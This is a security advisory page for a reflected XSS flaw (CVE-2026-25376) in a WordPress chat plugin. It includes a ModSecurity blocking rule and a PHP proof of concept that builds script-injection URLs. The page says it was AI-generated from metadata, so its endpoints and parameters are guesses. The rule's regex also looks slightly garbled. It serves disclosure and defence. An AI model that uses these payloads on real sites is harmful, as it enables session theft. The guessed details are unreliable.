Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : April 6, 2026

CVE-2026-25376: Addon Jobsearch Chat <= 3.0 – Reflected Cross-Site Scripting (addon-jobsearch-chat)

Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 3.0
Patched Version
Disclosed March 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25376 (metadata-based):
This vulnerability is a reflected cross-site scripting (XSS) flaw in the Addon Jobsearch Chat WordPress plugin, affecting versions up to and including 3.0. The vulnerability stems from insufficient input sanitization and output escaping in one or more plugin endpoints. Unauthenticated attackers can exploit this by tricking a user into clicking a malicious link, leading to arbitrary script execution in the victim’s browser context.

Atomic Edge research infers the root cause is a failure to properly sanitize user-controlled input before echoing it back in an HTTP response. The CWE-79 classification confirms improper neutralization of input during web page generation. The vulnerability description indicates the issue is insufficient input sanitization and output escaping. Without access to the source code, this analysis concludes the plugin likely echoes a GET or POST parameter directly to the page without applying appropriate WordPress escaping functions like `esc_html()` or `esc_js()`.

The exploitation method is a classic reflected XSS attack. An attacker crafts a URL containing a malicious JavaScript payload within a vulnerable plugin parameter. This URL is delivered to a victim via phishing or a malicious redirect. When the victim, authenticated to WordPress, clicks the link, the payload executes in their browser. Based on WordPress plugin patterns, the vulnerable endpoint is likely an AJAX handler (`/wp-admin/admin-ajax.php`) with an action parameter like `jobsearch_chat_action`, or a public-facing page rendered by the plugin’s shortcode. The payload would be placed in a parameter like `message` or `user_id`.

Remediation requires proper input validation and contextual output escaping. The patched version (3.1) likely implemented WordPress sanitization functions (e.g., `sanitize_text_field()`) on input and escaping functions (e.g., `esc_html()`, `wp_kses()`) on all dynamic values before they are output in HTML context. A secure coding review of all user-input echo points in the plugin would be necessary to fully address the issue.

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim’s browser session. This can lead to session hijacking (cookie theft), actions performed on behalf of the user, defacement, or redirection to malicious sites. The CVSS vector scores Scope (S:C) as Changed, indicating the attack can impact resources beyond the vulnerable plugin itself, potentially affecting the entire WordPress admin session.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-25376 (metadata-based)
# This rule targets Reflected XSS in the Addon Jobsearch Chat plugin via its AJAX handler.
# It blocks requests to the WordPress AJAX endpoint containing the plugin's likely action and malicious script patterns in common parameters.
# The rule uses a chain to ensure precision: it must be the AJAX endpoint, with the plugin's action, and a dangerous parameter value.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:2537601,phase:2,deny,status:403,chain,msg:'CVE-2026-25376: Reflected XSS via Addon Jobsearch Chat AJAX',severity:'CRITICAL',tag:'CVE-2026-25376',tag:'WordPress',tag:'Plugin',tag:'XSS'"
  SecRule ARGS_GET:action|ARGS_POST:action "@rx ^(jobsearch_chat_|chat_|addon_jobsearch_chat_)" 
    "chain,t:none"
    SecRule ARGS_GET|ARGS_POST "@rx (?i)<script[^>]*>|javascript:|onloads*=|onerrors*=" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-25376 - Addon Jobsearch Chat <= 3.0 - Reflected Cross-Site Scripting
<?php
/**
 * Proof of Concept for Reflected XSS in Addon Jobsearch Chat plugin.
 * This script generates a malicious link targeting a likely vulnerable endpoint.
 * The exact vulnerable parameter and endpoint are inferred from common plugin patterns.
 * Assumption: The plugin uses an AJAX handler or a public page that echoes a GET parameter without escaping.
 */

$target_url = 'https://target-site.com';

// Common WordPress AJAX endpoint for plugin actions
$ajax_endpoint = '/wp-admin/admin-ajax.php';

// The 'action' parameter for AJAX requests is often derived from the plugin slug.
// Common patterns include 'jobsearch_chat_action', 'jobsearch_chat_ajax', etc.
$likely_action = 'jobsearch_chat_action';

// A parameter likely to be echoed back, such as 'msg', 'message', 'id', or 'user'.
$likely_vulnerable_param = 'message';

// A basic XSS payload to trigger a JavaScript alert.
$payload = '<script>alert(document.domain)</script>';

// Construct the malicious URL.
// Using GET for a reflected XSS attack. The action parameter is sent via POST in normal AJAX, but a reflected XSS could also be in a GET parameter on a different page.
// Alternative: The vulnerability could be in a public-facing page (e.g., /chat/).
// This PoC presents two likely scenarios.

// Scenario 1: AJAX endpoint via GET (if the plugin improperly handles GET parameters for the action).
$url_scenario_1 = $target_url . $ajax_endpoint . '?action=' . urlencode($likely_action) . '&' . $likely_vulnerable_param . '=' . urlencode($payload);

// Scenario 2: A public page rendered by a plugin shortcode (e.g., a chat page).
$url_scenario_2 = $target_url . '/?page_id=1&' . $likely_vulnerable_param . '=' . urlencode($payload); // Assume page_id 1 contains the chat shortcode.

echo "Atomic Edge CVE-2026-25376 PoC - Reflected XSSn";
echo "Target: " . $target_url . "nn";
echo "Likely AJAX-based exploit URL (Scenario 1):n";
echo $url_scenario_1 . "nn";
echo "Likely public page exploit URL (Scenario 2):n";
echo $url_scenario_2 . "nn";
echo "Instructions: Authenticate as a WordPress user (e.g., subscriber or higher) in the browser. Then visit one of the above URLs. If vulnerable, a JavaScript alert with the domain will pop.n";

// Optional: Use cURL to probe the endpoint (may not trigger XSS as it requires browser execution).
// echo "nProbing the AJAX endpoint...n";
// $ch = curl_init($url_scenario_1);
// curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// $response = curl_exec($ch);
// curl_close($ch);
// if (strpos($response, $payload) !== false) {
//     echo "[!] The payload was reflected unsanitized in the response.n";
// } else {
//     echo "[-] Payload not found reflected raw. The endpoint may require POST, or a different parameter.n";
// }

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School